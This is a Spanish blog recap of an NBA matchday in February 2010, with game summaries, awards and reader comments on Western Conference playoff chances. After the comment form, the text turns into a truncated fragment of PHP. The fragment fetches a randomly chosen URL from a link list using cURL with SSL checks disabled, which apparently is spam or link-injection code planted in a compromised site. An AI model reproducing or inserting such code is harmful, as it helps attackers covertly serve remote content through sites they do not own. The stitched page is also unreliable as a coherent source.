La Crónica (09/02/2010)

10 de February de 2010 por telekoman

11 partidos para esta jornada casi pre-All Star, con pocas sorpresas y algún marcador exagerado.

Empezaremos con el a priori partido más interesante de la jornada, Dallas contra Denver. Los Billups, Melo y sobretodo Nene se han comido literalmente a un equipo que decían eran los Mavericks. Francamente lo dudamos. Curioso el equipo que puso Carlise de inicio sobre la pista con 4 jugadores “bajitos” y tan sólo Nowitzki como hombre alto. Resultado, Nene ha hecho lo que le ha venido en gana en la zona y se ha llevado 21 puntos y 8 rebotes tranquilamente. El equipo de Colorado ha sacado 15 rebotes de diferencia a su rival y los hombres importantes han podido descansar.

El otro partido con un una diferencia exagerada ha sido el Houston – Miami. Los de “Flash” Wade han recuperado juego y han pasado por encima de unos Rockets que más parecen “petardillos de feria”. Con poquísimas ideas en ataque en el lado tejano, a los de Miami les ha valido con algo de Wade (17 puntos, lejos de las exhibiciones a las que nos tiene acostumbrados) y un poquito de Haslem y Cook para agarrarse a la octava plaza del Este. Les ha venido fantástico la derrota de los Bucks frente unos Pistons en los que volvía Gordon.

El primer partido de la jornada nos dejó la ajustada victoria de Charlotte sobre Washington, con Stephen Jackson y Gerald Wallace de pilares fundamentales y Jamison perdiendo dos oportunidades de llevarse el partido. De nuevo el “poco implicado” Butler sobresalió por los Wizards. En otro partido interesante Chicago ganó a Indiana gracias al trio Rose, Deng, Salmons. Entre los 3 jugadores hicieron 63 puntos, mientras que por Indiana nuevamente Granger luchó muy mal acompañado. Atlanta continúa luchando por la primera plaza de la división sureste y se deshicieron con facilidad de unos Grizzlies a los que les está costando llegar al parón del All Star. Por los Hawks destacó Crawford con 28 puntos mientras que los 5 miembros del quinteto titular estuvieron por encima de 11 puntos.

Utah continúa intentando cazar a Denver en la primera plaza de la división Noroeste gracias a su victoria sobre unos Clippers en los que tan solo el quinteto titular da el callo, mientras que el banquillo es un auténtico erial. Kings y Knicks tuvieron que llegar a la prórroga para decidir su partido. Los de Sacramento se llevaron el gato al agua gracias a un Tyreke Evans que anotó 14 de sus 27 puntos entre el último cuarto y la prórroga. Curiosa también la decisión de Westphal de no sacar a Kevin Martin desde el inicio. Cuando el río suena…. En la lucha por la septima plaza del Oeste los Thunder consiguieron la victoria gracias a un gran último cuarto y un Durant en estado de gracia.

Finalmente, Cleveland  se deshizo sin demasiados problemas de la banda de los Nets, mientras que Philadelphia intenta pillar plaza de playoffs ganando a unos pobres Timberwolves.

PREMIOS

MVP: Varios participantes a este premio. Por ejemplo, Tyreke Evans con 27 puntos, 10 rebotes y 6 asistencias, o Jamal Crawford con 28 puntos o incluso Iguodala, Deng o Rose. También  podríamos dar el premio al de siempre ya que  Lebron pasó por encima de los Nets con 32 puntos y 11 asistencias o a Kevin Durant que lideró la victoria de New Orleans con 33 puntos y 11 rebotes. Pero creemos que el galardón se lo merece Carlos Boozer que se fue a 34 puntos y 14 rebotes con unos porcentajes impresionantes.

El rookie: Evidentemente vamos a dar el premio a Tyreke aunque sus enemigos para el ROY tampoco lo hicieron mal. Jennings perdió con Milwaukee con 18 puntos y 5 asistencias y Jonny Flynn consiguió 14 puntos y 6 rebotes. De todas maneras, muy superior el de los Kings.

La sorpresa: Nuevamente la sorpresa nos la dio la alineación de Dallas y el batacazo correspondiente que se llevaron los Mavericks.

La decepción: Realmente decepcionante la actuación de los tiradores de Portland. 7 de 27 entre Webster, Batum, Rudy y Bayless no es para estar orgullosos. En especial los 6 triples fallados por Rudy en los 6 únicos tiros que intentó.

El mayor esfuerzo en vano: Ilustres veteranos de esta sección como Granger, Butler o Bogut se quedan sin premio gracias a los 35 puntos  y 5 rebotes de Wilson Chandler.

Comenta

4 comentarios a esta entrada

  1. sayim dice:
    #1

    Ahora mismo a cuantos equipos del Oeste les dariais plaza segura para la post-temporada?? 3, 4, 5? Lakers, Nuggs, Jazz…. Os atreveis a poner la mano en el fuego por algún otro? Yo ni siquiera por Mavs o Suns, antes incluso m la juego por los Thunder…. Habrá q ver si hay algun traspaso q altere la situación…

      Citar

  2. Viva_Dirk dice:
    #2

    Yo es que no entiendo a que juega Carlise, siempre ha sido un tipo de juego lento y controlado, cosa que le ha dado unos resultados mas que decentes. Intentando cosas que no sabe hacer desde luego los Mavs no son seguros en la post-temporada, aunque también hay que contar con que son un equipo veterano y seguramente después del All-Star jugarán a mejor nivel.

      Citar

  3. sergio dice:
    #3

    Solo 2: Nuggets y Lakers. Del 3 (Utah) al 11 (Memphis) hay solo 6 partidos de diferencia. Tambien habra que ver los calendarios que tienen cada uno… que no tengo ni idea de como van.

      Citar

  4. Love Denise dice:
    #4

    Buen articulo telekoman.
    Aunque jennings siga a un buen nivel, creo que Evans, es ahora el favorito indiscutible a Mejor Rookie.
    Plaza segura en el Oeste? Yo diría, Lakers y Mavs.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>